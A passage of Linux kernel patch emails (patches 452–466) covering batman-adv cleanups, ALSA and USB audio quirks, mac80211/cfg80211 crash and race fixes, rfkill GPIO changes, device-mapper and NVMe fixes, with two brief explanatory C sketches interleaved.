hard_iface = batadv_hardif_get_by_netdev(slave_dev); - if (!hard_iface || hard_iface->soft_iface != NULL) + if (!hard_iface || hard_iface->soft_iface) goto out; ret = batadv_hardif_enable_interface(hard_iface, dev->name); From fc1f86936651191ca51e532083206efb351ccd9c Mon Sep 17 00:00:00 2001 From: Marek Lindner Date: Wed, 18 Feb 2015 22:19:20 +0800 Subject: [PATCH 452/872] batman-adv: checkpatch - spaces preferred around that '*' Signed-off-by: Marek Lindner --- net/batman-adv/main.h | 2 +- net/batman-adv/network-coding.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/net/batman-adv/main.h b/net/batman-adv/main.h index 11d2d9fbfc5e..026ba37f31a6 100644 --- a/net/batman-adv/main.h +++ b/net/batman-adv/main.h @@ -44,7 +44,7 @@ #define BATADV_TT_CLIENT_TEMP_TIMEOUT 600000 /* in milliseconds */ #define BATADV_TT_WORK_PERIOD 5000 /* 5 seconds */ #define BATADV_ORIG_WORK_PERIOD 1000 /* 1 second */ -#define BATADV_DAT_ENTRY_TIMEOUT (5*60000) /* 5 mins in milliseconds */ +#define BATADV_DAT_ENTRY_TIMEOUT (5 * 60000) /* 5 mins in milliseconds */ /* sliding packet range of received originator messages in sequence numbers * (should be a multiple of our word size) */ diff --git a/net/batman-adv/network-coding.c b/net/batman-adv/network-coding.c index 4cb70bb4c3e8..b984bc49deaf 100644 --- a/net/batman-adv/network-coding.c +++ b/net/batman-adv/network-coding.c @@ -275,7 +275,7 @@ static bool batadv_nc_to_purge_nc_path_decoding(struct batadv_priv *bat_priv, * max_buffer time */ return batadv_has_timed_out(nc_path->last_valid, - bat_priv->nc.max_buffer_time*10); + 
bat_priv->nc.max_buffer_time * 10); } /** From 8f34b388786a952382c829453f280384f1bf3886 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:29 +0100 Subject: [PATCH 453/872] batman-adv: iv_ogm_can_aggregate, code readability This patch tries to increase code readability by negating the first if block and rearranging some of the other conditional blocks. This way we save an indentation level, we also save some allocation that is not necessary for one of the conditions. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 102 +++++++++++++++++++----------------- 1 file changed, 53 insertions(+), 49 deletions(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index f9c561094942..ce04cd75fae4 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -544,58 +544,62 @@ batadv_iv_ogm_can_aggregate(const struct batadv_ogm_packet *new_bat_ogm_packet, * - the send time is within our MAX_AGGREGATION_MS time * - the resulting packet wont be bigger than * MAX_AGGREGATION_BYTES + * otherwise aggregation is not possible */ - if (time_before(send_time, forw_packet->send_time) && - time_after_eq(aggregation_end_time, forw_packet->send_time) && - (aggregated_bytes <= BATADV_MAX_AGGREGATION_BYTES)) { - /* check aggregation compatibility - * -> direct link packets are broadcasted on - * their interface only - * -> aggregate packet if the current packet is - * a "global" packet as well as the base - * packet - */ - primary_if = batadv_primary_if_get_selected(bat_priv); - if (!primary_if) - goto out; - - /* packet is not leaving on the same interface. */ - if (forw_packet->if_outgoing != if_outgoing) - goto out; + if (!time_before(send_time, forw_packet->send_time) || + !time_after_eq(aggregation_end_time, forw_packet->send_time)) + return false; + + if (aggregated_bytes > BATADV_MAX_AGGREGATION_BYTES) + return false; + + /* packet is not leaving on the same interface. 
*/ + if (forw_packet->if_outgoing != if_outgoing) + return false; + + /* check aggregation compatibility + * -> direct link packets are broadcasted on + * their interface only + * -> aggregate packet if the current packet is + * a "global" packet as well as the base + * packet + */ + primary_if = batadv_primary_if_get_selected(bat_priv); + if (!primary_if) + return false; - /* packets without direct link flag and high TTL - * are flooded through the net - */ - if ((!directlink) && - (!(batadv_ogm_packet->flags & BATADV_DIRECTLINK)) && - (batadv_ogm_packet->ttl != 1) && - - /* own packets originating non-primary - * interfaces leave only that interface - */ - ((!forw_packet->own) || - (forw_packet->if_incoming == primary_if))) { - res = true; - goto out; - } + /* packets without direct link flag and high TTL + * are flooded through the net + */ + if (!directlink && + !(batadv_ogm_packet->flags & BATADV_DIRECTLINK) && + batadv_ogm_packet->ttl != 1 && + + /* own packets originating non-primary + * interfaces leave only that interface + */ + (!forw_packet->own || + forw_packet->if_incoming == primary_if)) { + res = true; + goto out; + } - /* if the incoming packet is sent via this one - * interface only - we still can aggregate - */ - if ((directlink) && - (new_bat_ogm_packet->ttl == 1) && - (forw_packet->if_incoming == if_incoming) && - - /* packets from direct neighbors or - * own secondary interface packets - * (= secondary interface packets in general) - */ - (batadv_ogm_packet->flags & BATADV_DIRECTLINK || - (forw_packet->own && - forw_packet->if_incoming != primary_if))) { - res = true; - goto out; - } + /* if the incoming packet is sent via this one + * interface only - we still can aggregate + */ + if (directlink && + new_bat_ogm_packet->ttl == 1 && + forw_packet->if_incoming == if_incoming && + + /* packets from direct neighbors or + * own secondary interface packets + * (= secondary interface packets in general) + */ + (batadv_ogm_packet->flags & BATADV_DIRECTLINK || + (forw_packet->own && + forw_packet->if_incoming != primary_if))) { + res = true; + goto out; } out: From 01b97a3eed3fe40e3a007d56935b421023bca2e3 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:30 +0100 Subject: [PATCH 454/872] batman-adv: iv_ogm_orig_update, remove unnecessary brackets Remove these unnecessary brackets inside a condition. 
Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index ce04cd75fae4..c5ba7a798de7 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -1081,7 +1081,7 @@ batadv_iv_ogm_orig_update(struct batadv_priv *bat_priv, * won't consider it either */ if (router_ifinfo && - (neigh_ifinfo->bat_iv.tq_avg == router_ifinfo->bat_iv.tq_avg)) { + neigh_ifinfo->bat_iv.tq_avg == router_ifinfo->bat_iv.tq_avg) { orig_node_tmp = router->orig_node; spin_lock_bh(&orig_node_tmp->bat_iv.ogm_cnt_lock); if_num = router->if_incoming->if_num; From 8ea64e27080eb66dc26f64f28485c0bc9fc06b36 Mon Sep 17 00:00:00 2001 From: Antonio Quartulli Date: Mon, 11 May 2015 20:34:52 +0200 Subject: [PATCH 455/872] batman-adv: Use common declaration order in *_send_skb_(packet|unicast) Signed-off-by: Antonio Quartulli --- net/batman-adv/send.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/send.c b/net/batman-adv/send.c index fa70ae8c9fe8..23635bd63fec 100644 --- a/net/batman-adv/send.c +++ b/net/batman-adv/send.c @@ -255,8 +255,8 @@ int batadv_send_skb_unicast(struct batadv_priv *bat_priv, struct batadv_orig_node *orig_node, unsigned short vid) { - struct ethhdr *ethhdr; struct batadv_unicast_packet *unicast_packet; + struct ethhdr *ethhdr; int ret = NET_XMIT_DROP; if (!orig_node) From 927392d73a97d8d235bb65400e2e3c7f0bec2b6f Mon Sep 17 00:00:00 2001 From: Ingo Molnar Date: Fri, 23 Nov 2012 19:19:07 +0100 Subject: [PATCH 456/872] x86/boot: Add CONFIG_PARAVIRT_SPINLOCKS quirk to arch/x86/boot/compressed/misc.h MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Linus reported the following new warning on x86 allmodconfig with GCC 5.1: > ./arch/x86/include/asm/spinlock.h: In function ‘arch_spin_lock’: > ./arch/x86/include/asm/spinlock.h:119:3: warning: implicit declaration > of function ‘__ticket_lock_spinning’ [-Wimplicit-function-declaration] > __ticket_lock_spinning(lock, inc.tail); > ^ This warning triggers because of these hacks in misc.h: /* * we have to be careful, because no indirections are allowed here, and * paravirt_ops is a kind of one. As it will only run in baremetal anyway, * we just keep it from happening */ #undef CONFIG_PARAVIRT #undef CONFIG_KASAN But these hacks were not updated when CONFIG_PARAVIRT_SPINLOCKS was added, and eventually (with the introduction of queued paravirt spinlocks in recent kernels) this created an invalid Kconfig combination and broke the build. So add a CONFIG_PARAVIRT_SPINLOCKS #undef line as well. Also remove the _ASM_X86_DESC_H quirk: that undocumented quirk was originally added ages ago, in: 099e1377269a ("x86: use ELF format in compressed images.") and I went back to that kernel (and fixed up the main Makefile which didn't build anymore) and checked what failure it avoided: it avoided an include file dependencies related build failure related to our old x86-platforms code. That old code is long gone, the header dependencies got cleaned up, and the build does not fail anymore with the totality of asm/desc.h included - so remove the quirk. Reported-by: Linus Torvalds Cc: "H. 
Peter Anvin" Cc: Thomas Gleixner Cc: linux-kernel@vger.kernel.org Signed-off-by: Ingo Molnar --- arch/x86/boot/compressed/misc.h | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/arch/x86/boot/compressed/misc.h b/arch/x86/boot/compressed/misc.h index 89dd0d78013a..805d25ca5f1d 100644 --- a/arch/x86/boot/compressed/misc.h +++ b/arch/x86/boot/compressed/misc.h @@ -2,15 +2,14 @@ #define BOOT_COMPRESSED_MISC_H /* - * we have to be careful, because no indirections are allowed here, and - * paravirt_ops is a kind of one. As it will only run in baremetal anyway, - * we just keep it from happening + * Special hack: we have to be careful, because no indirections are allowed here, + * and paravirt_ops is a kind of one. As it will only run in baremetal anyway, + * we just keep it from happening. (This list needs to be extended when new + * paravirt and debugging variants are added.) */ #undef CONFIG_PARAVIRT +#undef CONFIG_PARAVIRT_SPINLOCKS #undef CONFIG_KASAN -#ifdef CONFIG_X86_32 -#define _ASM_X86_DESC_H 1 -#endif #include #include
From 81a1231bf8d6c244681a87808681cf00919df77c Mon Sep 17 00:00:00 2001 From: Kailang Yang Date: Thu, 28 May 2015 16:48:22 +0800 Subject: [PATCH 457/872] ALSA: hda/realtek - Support Dell headset mode for ALC256 Dell SSID 0x0706 supports headset mode. Signed-off-by: Kailang Yang Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_realtek.c | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c index 464168426465..80be33ce1a9e 100644 --- a/sound/pci/hda/patch_realtek.c +++ b/sound/pci/hda/patch_realtek.c @@ -5376,6 +5376,13 @@ static const struct snd_hda_pin_quirk alc269_pin_fixup_tbl[] = { {0x17, 0x40000000}, {0x1d, 0x40700001}, {0x21, 0x02211040}), + SND_HDA_PIN_QUIRK(0x10ec0256, 0x1028, "Dell", ALC255_FIXUP_DELL1_MIC_NO_PRESENCE, + ALC255_STANDARD_PINS, + {0x12, 0x90a60160}, + {0x14, 0x90170120}, + {0x17, 0x40000000}, + {0x1d, 0x40700001}, + {0x21, 0x02211030}), SND_HDA_PIN_QUIRK(0x10ec0256, 0x1028, "Dell", ALC255_FIXUP_DELL1_MIC_NO_PRESENCE, ALC256_STANDARD_PINS, {0x13, 0x40000000}),
From 1ef9f0583514508bc93427106ceef3215e4eb1a5 Mon Sep 17 00:00:00 2001 From: Wolfram Sang Date: Fri, 29 May 2015 19:50:56 +0900 Subject: [PATCH 458/872] ALSA: usb-audio: Add mic volume fix quirk for Logitech Quickcam Fusion Fix this from the logs: usb 7-1: New USB device found, idVendor=046d, idProduct=08ca ... usb 7-1: Warning! Unlikely big volume range (=3072), cval->res is probably wrong. usb 7-1: [5] FU [Mic Capture Volume] ch = 1, val = 4608/7680/1 Signed-off-by: Wolfram Sang Cc: Signed-off-by: Takashi Iwai --- sound/usb/mixer.c | 1 + 1 file changed, 1 insertion(+) diff --git a/sound/usb/mixer.c b/sound/usb/mixer.c index 3e2ef61c627b..4256fdedbd80 100644 --- a/sound/usb/mixer.c +++ b/sound/usb/mixer.c @@ -918,6 +918,7 @@ static void volume_control_quirks(struct usb_mixer_elem_info *cval, case USB_ID(0x046d, 0x081d): /* HD Webcam c510 */ case USB_ID(0x046d, 0x0825): /* HD Webcam c270 */ case USB_ID(0x046d, 0x0826): /* HD Webcam c525 */ + case USB_ID(0x046d, 0x08ca): /* Logitech Quickcam Fusion */ case USB_ID(0x046d, 0x0991): /* Most audio usb devices lie about volume resolution. * Most Logitech webcams have res = 384.
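As an aside, the device-ID-keyed quirk pattern used above can be sketched in stand-alone C roughly as follows; the QUIRK_ID macro, the helper function and its use of the 384 value are simplified assumptions for illustration, not the actual sound/usb/mixer.c code.

#include <stdint.h>
#include <stdio.h>

/* Pack vendor and product IDs into a single key, mirroring the USB_ID idea. */
#define QUIRK_ID(vendor, product) (((uint32_t)(vendor) << 16) | (product))

/* Return a corrected volume-control resolution for known-broken devices,
 * or 0 when no override is needed.
 */
static int quirk_volume_res(uint16_t vendor, uint16_t product)
{
        switch (QUIRK_ID(vendor, product)) {
        case QUIRK_ID(0x046d, 0x08ca):  /* Logitech Quickcam Fusion */
        case QUIRK_ID(0x046d, 0x0825):  /* HD Webcam c270 */
                return 384;             /* "Most Logitech webcams have res = 384" */
        default:
                return 0;
        }
}

int main(void)
{
        printf("res override: %d\n", quirk_volume_res(0x046d, 0x08ca));
        return 0;
}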
From ab499db80fcf07c18e4053f91a619500f663e90e Mon Sep 17 00:00:00 2001 From: Michal Kazior Date: Fri, 22 May 2015 10:22:40 +0200 Subject: [PATCH 459/872] mac80211: prevent possible crypto tx tailroom corruption There was a possible race between ieee80211_reconfig() and ieee80211_delayed_tailroom_dec(). This could result in inability to transmit data if driver crashed during roaming or rekeying and subsequent skbs with insufficient tailroom appeared. This race was probably never seen in the wild because a device driver would have to crash AND recover within 0.5s which is very unlikely. I was able to prove this race exists after changing the delay to 10s locally and crashing ath10k via debugfs immediately after GTK rekeying. In case of ath10k the counter went below 0. This was harmless but other drivers which actually require tailroom (e.g. for WEP ICV or MMIC) could end up with the counter at 0 instead of >0 and introduce insufficient skb tailroom failures because mac80211 would not resize skbs appropriately anymore. Fixes: 8d1f7ecd2af5 ("mac80211: defer tailroom counter manipulation when roaming") Signed-off-by: Michal Kazior Signed-off-by: Johannes Berg --- net/mac80211/main.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/net/mac80211/main.c b/net/mac80211/main.c index 99d27babd9f0..674164fe5cdb 100644 --- a/net/mac80211/main.c +++ b/net/mac80211/main.c @@ -246,6 +246,7 @@ static void ieee80211_restart_work(struct work_struct *work) { struct ieee80211_local *local = container_of(work, struct ieee80211_local, restart_work); + struct ieee80211_sub_if_data *sdata; /* wait for scan work complete */ flush_workqueue(local->workqueue); @@ -254,6 +255,8 @@ static void ieee80211_restart_work(struct work_struct *work) "%s called with hardware scan in progress\n", __func__); rtnl_lock(); + list_for_each_entry(sdata, &local->interfaces, list) + flush_delayed_work(&sdata->dec_tailroom_needed_wk); ieee80211_scan_cancel(local); ieee80211_reconfig(local); rtnl_unlock(); From 6cbfb1bb66e4e85da5db78e8ff429a85bd84ce64 Mon Sep 17 00:00:00 2001 From: Michal Kazior Date: Fri, 22 May 2015 10:57:22 +0200 Subject: [PATCH 460/872] cfg80211: ignore netif running state when changing iftype It was possible for mac80211 to be coerced into an unexpected flow causing sdata union to become corrupted. Station pointer was put into sdata->u.vlan.sta memory location while it was really master AP's sdata->u.ap.next_beacon. This led to station entry being later freed as next_beacon before __sta_info_flush() in ieee80211_stop_ap() and a subsequent invalid pointer dereference crash. The problem was that ieee80211_ptr->use_4addr wasn't cleared on interface type changes. This could be reproduced with the following steps: # host A and host B have just booted; no # wpa_s/hostapd running; all vifs are down host A> iw wlan0 set type station host A> iw wlan0 set 4addr on host A> printf 'interface=wlan0\nssid=4addrcrash\nchannel=1\nwds_sta=1' > /tmp/hconf host A> hostapd -B /tmp/conf host B> iw wlan0 set 4addr on host B> ifconfig wlan0 up host B> iw wlan0 connect -w hostAssid host A> pkill hostapd # host A crashed: [ 127.928192] BUG: unable to handle kernel NULL pointer dereference at 00000000000006c8 [ 127.929014] IP: [] __sta_info_flush+0xac/0x158 ... [ 127.934578] [] ieee80211_stop_ap+0x139/0x26c [ 127.934578] [] ? 
dump_trace+0x279/0x28a [ 127.934578] [] __cfg80211_stop_ap+0x84/0x191 [ 127.934578] [] cfg80211_stop_ap+0x3f/0x58 [ 127.934578] [] nl80211_stop_ap+0x1b/0x1d [ 127.934578] [] genl_family_rcv_msg+0x259/0x2b5 Note: This isn't a revert of f8cdddb8d61d ("cfg80211: check iface combinations only when iface is running") as far as functionality is considered because b6a550156bc ("cfg80211/mac80211: move more combination checks to mac80211") moved the logic somewhere else already. Fixes: f8cdddb8d61d ("cfg80211: check iface combinations only when iface is running") Signed-off-by: Michal Kazior Signed-off-by: Johannes Berg --- net/wireless/util.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/wireless/util.c b/net/wireless/util.c index 4cb34557b873..baf7218cec15 100644 --- a/net/wireless/util.c +++ b/net/wireless/util.c @@ -945,7 +945,7 @@ int cfg80211_change_iface(struct cfg80211_registered_device *rdev, ntype == NL80211_IFTYPE_P2P_CLIENT)) return -EBUSY; - if (ntype != otype && netif_running(dev)) { + if (ntype != otype) { dev->ieee80211_ptr->use_4addr = false; dev->ieee80211_ptr->mesh_id_up_len = 0; wdev_lock(dev->ieee80211_ptr); From f7959e9c73200f2ae361d0d311aa501f2c6a05c7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Uwe=20Kleine-K=C3=B6nig?= Date: Thu, 28 May 2015 11:46:12 +0200 Subject: [PATCH 461/872] net: rfkill: gpio: make better use of gpiod API MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Since 39b2bbe3d715 (gpio: add flags argument to gpiod_get*() functions) which appeared in v3.17-rc1, the gpiod_get* functions take an additional parameter that allows to specify direction and initial value for output. Furthermore there is devm_gpiod_get_optional which is designed to get optional gpios. Simplify driver accordingly. Note this makes error checking more strict because only -ENOENT is ignored when searching for the GPIOs which is good. Signed-off-by: Uwe Kleine-König Signed-off-by: Johannes Berg --- net/rfkill/rfkill-gpio.c | 24 ++++++++++-------------- 1 file changed, 10 insertions(+), 14 deletions(-) diff --git a/net/rfkill/rfkill-gpio.c b/net/rfkill/rfkill-gpio.c index d978f2f46ff3..d5d58d919552 100644 --- a/net/rfkill/rfkill-gpio.c +++ b/net/rfkill/rfkill-gpio.c @@ -112,21 +112,17 @@ static int rfkill_gpio_probe(struct platform_device *pdev) rfkill->clk = devm_clk_get(&pdev->dev, NULL); - gpio = devm_gpiod_get(&pdev->dev, "reset"); - if (!IS_ERR(gpio)) { - ret = gpiod_direction_output(gpio, 0); - if (ret) - return ret; - rfkill->reset_gpio = gpio; - } + gpio = devm_gpiod_get_optional(&pdev->dev, "reset", GPIOD_OUT_LOW); + if (IS_ERR(gpio)) + return PTR_ERR(gpio); - gpio = devm_gpiod_get(&pdev->dev, "shutdown"); - if (!IS_ERR(gpio)) { - ret = gpiod_direction_output(gpio, 0); - if (ret) - return ret; - rfkill->shutdown_gpio = gpio; - } + rfkill->reset_gpio = gpio; + + gpio = devm_gpiod_get_optional(&pdev->dev, "shutdown", GPIOD_OUT_LOW); + if (IS_ERR(gpio)) + return PTR_ERR(gpio); + + rfkill->shutdown_gpio = gpio; /* Make sure at-least one of the GPIO is defined and that * a name is specified for this instance From 5530c84f62b49a2e9f8c11a079d00f85ea20bb09 Mon Sep 17 00:00:00 2001 From: Geert Uytterhoeven Date: Tue, 26 May 2015 12:58:37 +0200 Subject: [PATCH 462/872] ARM: multi_v7_defconfig: Replace CONFIG_USB_ISP1760_HCD by CONFIG_USB_ISP1760 Since commit 100832abf065bc18 ("usb: isp1760: Make HCD support optional"), CONFIG_USB_ISP1760_HCD is automatically selected when needed. 
Enabling that option in the defconfig is now a no-op, and no longer enables ISP1760 HCD support. Re-enable the ISP1760 driver in the defconfig by enabling USB_ISP1760_HOST_ROLE instead. Signed-off-by: Geert Uytterhoeven Signed-off-by: Arnd Bergmann --- arch/arm/configs/multi_v7_defconfig | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/arm/configs/multi_v7_defconfig b/arch/arm/configs/multi_v7_defconfig index 0ca4a3eaf65d..fbbb1915c6a9 100644 --- a/arch/arm/configs/multi_v7_defconfig +++ b/arch/arm/configs/multi_v7_defconfig @@ -429,7 +429,7 @@ CONFIG_USB_EHCI_EXYNOS=y CONFIG_USB_EHCI_TEGRA=y CONFIG_USB_EHCI_HCD_STI=y CONFIG_USB_EHCI_HCD_PLATFORM=y -CONFIG_USB_ISP1760_HCD=y +CONFIG_USB_ISP1760=y CONFIG_USB_OHCI_HCD=y CONFIG_USB_OHCI_HCD_STI=y CONFIG_USB_OHCI_HCD_PLATFORM=y
From e5d8de32cc02a259e1a237ab57cba00f2930fa6a Mon Sep 17 00:00:00 2001 From: Mike Snitzer Date: Thu, 28 May 2015 15:12:52 -0400 Subject: [PATCH 463/872] dm: fix false warning in free_rq_clone() for unmapped requests When a request-based dm device is stacked on a non-blk-mq device and the device-mapper target cannot map the request (an error target is used, a multipath target has all paths down, etc.), the WARN_ON_ONCE() in free_rq_clone() will trigger when it shouldn't. The warning was added by commit aa6df8d ("dm: fix free_rq_clone() NULL pointer when requeueing unmapped request"). But free_rq_clone() with clone->q == NULL is valid usage for the case where dm_kill_unmapped_request() initiates request cleanup. Fix this false warning by just removing the WARN_ON -- it only generated false positives and was never useful in catching the intended case (a completed clone request not being mapped, e.g. clone->q being NULL). Fixes: aa6df8d ("dm: fix free_rq_clone() NULL pointer when requeueing unmapped request") Reported-by: Bart Van Assche Reported-by: Jun'ichi Nomura Signed-off-by: Mike Snitzer --- drivers/md/dm.c | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/drivers/md/dm.c b/drivers/md/dm.c index 1badfb250a18..e24069aaeb18 100644 --- a/drivers/md/dm.c +++ b/drivers/md/dm.c @@ -1082,13 +1082,11 @@ static void rq_completed(struct mapped_device *md, int rw, bool run_queue) dm_put(md); } -static void free_rq_clone(struct request *clone, bool must_be_mapped) +static void free_rq_clone(struct request *clone) { struct dm_rq_target_io *tio = clone->end_io_data; struct mapped_device *md = tio->md; - WARN_ON_ONCE(must_be_mapped && !clone->q); - blk_rq_unprep_clone(clone); if (md->type == DM_TYPE_MQ_REQUEST_BASED) @@ -1132,7 +1130,7 @@ static void dm_end_request(struct request *clone, int error) rq->sense_len = clone->sense_len; } - free_rq_clone(clone, true); + free_rq_clone(clone); if (!rq->q->mq_ops) blk_end_request_all(rq, error); else @@ -1151,7 +1149,7 @@ static void dm_unprep_request(struct request *rq) } if (clone) - free_rq_clone(clone, false); + free_rq_clone(clone); } /*
From fec558b5f178d9eb35d2ed76f15489c60e3590bd Mon Sep 17 00:00:00 2001 From: Arnd Bergmann Date: Tue, 19 May 2015 17:05:40 +0200 Subject: [PATCH 464/872] NVMe: fix type warning on 32-bit A recent change to the ioctl handling caused a new harmless warning in the NVMe driver on all 32-bit machines: drivers/block/nvme-core.c: In function 'nvme_submit_io': drivers/block/nvme-core.c:1794:29: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] In order to shut up that warning, this introduces a new temporary variable that uses a double cast to extract the pointer from an __u64 structure member.
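For illustration, a minimal user-space sketch of why the double cast helps (plain C with an assumed struct, not the NVMe driver code): on a 32-bit target, casting a 64-bit integer field straight to a pointer draws -Wint-to-pointer-cast because the sizes differ, while casting through the pointer-sized unsigned long first makes the narrowing explicit and silences the warning.

#include <stdint.h>
#include <stdio.h>

struct io_cmd {
        uint64_t metadata;      /* a user address carried as a fixed-width integer */
};

int main(void)
{
        struct io_cmd io = { .metadata = 0x1000 };

        /* On a 32-bit build, a direct cast such as
         *      void *bad = (void *)io.metadata;
         * warns, because uint64_t is wider than a pointer there.
         */

        /* Going through the pointer-sized integer type first keeps the
         * conversion explicit and warning-free on 32- and 64-bit alike.
         */
        void *meta = (void *)(unsigned long)io.metadata;

        printf("%p\n", meta);
        return 0;
}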
Signed-off-by: Arnd Bergmann Fixes: a67a95134ff ("NVMe: Meta data handling through submit io ioctl") Acked-by: Keith Busch Signed-off-by: Jens Axboe --- drivers/block/nvme-core.c | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/drivers/block/nvme-core.c b/drivers/block/nvme-core.c index 85b8036deaa3..683dff272562 100644 --- a/drivers/block/nvme-core.c +++ b/drivers/block/nvme-core.c @@ -1750,6 +1750,7 @@ static int nvme_submit_io(struct nvme_ns *ns, struct nvme_user_io __user *uio) struct nvme_iod *iod; dma_addr_t meta_dma = 0; void *meta = NULL; + void __user *metadata; if (copy_from_user(&io, uio, sizeof(io))) return -EFAULT; @@ -1763,6 +1764,8 @@ static int nvme_submit_io(struct nvme_ns *ns, struct nvme_user_io __user *uio) meta_len = 0; } + metadata = (void __user *)(unsigned long)io.metadata; + write = io.opcode & 1; switch (io.opcode) { @@ -1786,13 +1789,13 @@ static int nvme_submit_io(struct nvme_ns *ns, struct nvme_user_io __user *uio) if (meta_len) { meta = dma_alloc_coherent(&dev->pci_dev->dev, meta_len, &meta_dma, GFP_KERNEL); + if (!meta) { status = -ENOMEM; goto unmap; } if (write) { - if (copy_from_user(meta, (void __user *)io.metadata, - meta_len)) { + if (copy_from_user(meta, metadata, meta_len)) { status = -EFAULT; goto unmap; } @@ -1819,8 +1822,7 @@ static int nvme_submit_io(struct nvme_ns *ns, struct nvme_user_io __user *uio) nvme_free_iod(dev, iod); if (meta) { if (status == NVME_SC_SUCCESS && !write) { - if (copy_to_user((void __user *)io.metadata, meta, - meta_len)) + if (copy_to_user(metadata, meta, meta_len)) status = -EFAULT; } dma_free_coherent(&dev->pci_dev->dev, meta_len, meta, meta_dma); From 1b205c535b573fe95b7f6f6577a43671d312556f Mon Sep 17 00:00:00 2001 From: Tony Lindgren Date: Fri, 29 May 2015 09:59:42 -0700 Subject: [PATCH 465/872] ARM: dts: Fix dm816x to use right compatible flag for MUSB With commit 3e457371f436 ("usb: musb: Fix fifo reads for dm816x with musb_dsps") we need to use the right compatible flag to avoid issues with FIFO reads. Cc: Bin Liu Cc: Brian Hutchinson Cc: George Cherian Fixes: 3e457371f436 ("usb: musb: Fix fifo reads for dm816x with musb_dsps") Acked-by: Felipe Balbi Signed-off-by: Tony Lindgren --- arch/arm/boot/dts/dm816x.dtsi | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/arch/arm/boot/dts/dm816x.dtsi b/arch/arm/boot/dts/dm816x.dtsi index de8427be830a..289806adb343 100644 --- a/arch/arm/boot/dts/dm816x.dtsi +++ b/arch/arm/boot/dts/dm816x.dtsi @@ -382,7 +382,7 @@ ti,hwmods = "usb_otg_hs"; usb0: usb@47401000 { - compatible = "ti,musb-am33xx"; + compatible = "ti,musb-dm816"; reg = <0x47401400 0x400 0x47401000 0x200>; reg-names = "mc", "control"; @@ -422,7 +422,7 @@ }; usb1: usb@47401800 { - compatible = "ti,musb-am33xx"; + compatible = "ti,musb-dm816"; reg = <0x47401c00 0x400 0x47401800 0x200>; reg-names = "mc", "control"; From 15b94a690470038aa08247eedbebbe7e2218d5ee Mon Sep 17 00:00:00 2001 From: Junichi Nomura Date: Fri, 29 May 2015 08:51:03 +0000 Subject: [PATCH 466/872] dm: fix reload failure of 0 path multipath mapping on blk-mq devices dm-multipath accepts 0 path mapping. # echo '0 2097152 multipath 0 0 0 0' | dmsetup create newdev Such a mapping can be used to release underlying devices while still holding requests in its queue until working paths come back. 
However, once the multipath device is created over blk-mq devices, it rejects reloading of 0 path mapping: # echo '0 2097152 multipath 0 0 1 1 queue-length 0 1 1 /dev/sda 1' \ | dmsetup create mpath1 # echo '0 2097152 multipath 0 0 0 0' | dmsetup load mpath1 device-mapper: reload ioctl on mpath1 failed: Invalid argument Command failed With following kernel message: device-mapper: ioctl: can't change device type after initial table load. DM tries to inherit the current table type using dm_table_set_type() but it doesn't work as expected because of unnecessary check about whether the target type is hybrid or not. Hybrid type is for targets that work as either request-based or bio-based and not required for blk-mq or non blk-mq checking. Fixes: 65803c205983 ("dm table: train hybrid target type detection to select blk-mq if appropriate") Signed-off-by: Jun'ichi Nomura Signed-off-by: Mike Snitzer --- drivers/md/dm-table.c | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c index d9b00b8565c6..16ba55ad7089 100644 --- a/drivers/md/dm-table.c +++ b/drivers/md/dm-table.c @@ -820,6 +820,12 @@ void dm_consume_args(struct dm_arg_set *as, unsigned num_args) } EXPORT_SYMBOL(dm_consume_args); +static bool __table_type_request_based(unsigned table_type) +{ + return (table_type == DM_TYPE_REQUEST_BASED || + table_type == DM_TYPE_MQ_REQUEST_BASED); +} + static int dm_table_set_type(struct dm_table *t) { unsigned i; @@ -852,8 +858,7 @@ static int dm_table_set_type(struct dm_table *t) * Determine the type from the live device. * Default to bio-based if device is new. */ - if (live_md_type == DM_TYPE_REQUEST_BASED || - live_md_type == DM_TYPE_MQ_REQUEST_BASED) + if (__table_type_request_based(live_md_type)) request_based = 1; else bio_based = 1; @@ -903,7 +908,7 @@ static int dm_table_set_type(struct dm_table *t) } t->type = DM_TYPE_MQ_REQUEST_BASED; - } else if (hybrid && list_empty(devices) && live_md_type != DM_TYPE_NONE) { + } else if (list_empty(devices) && __table_type_request_based(live_md_type)) { /* inherit live MD type */ t->type = live_md_type; @@ -925,10 +930,7 @@ struct target_type *dm_table_get_immutable_target_type(struct dm_table *t) bool dm_table_request_based(struct dm_table *t) { - unsigned table_type = dm_table_get_type(t); - - return (table_type == DM_TYPE_REQUEST_BASED || - table_type == DM_TYPE_MQ_REQUEST_BASED); + return __table_type_request_based(dm_table_get_type(t)); } bool 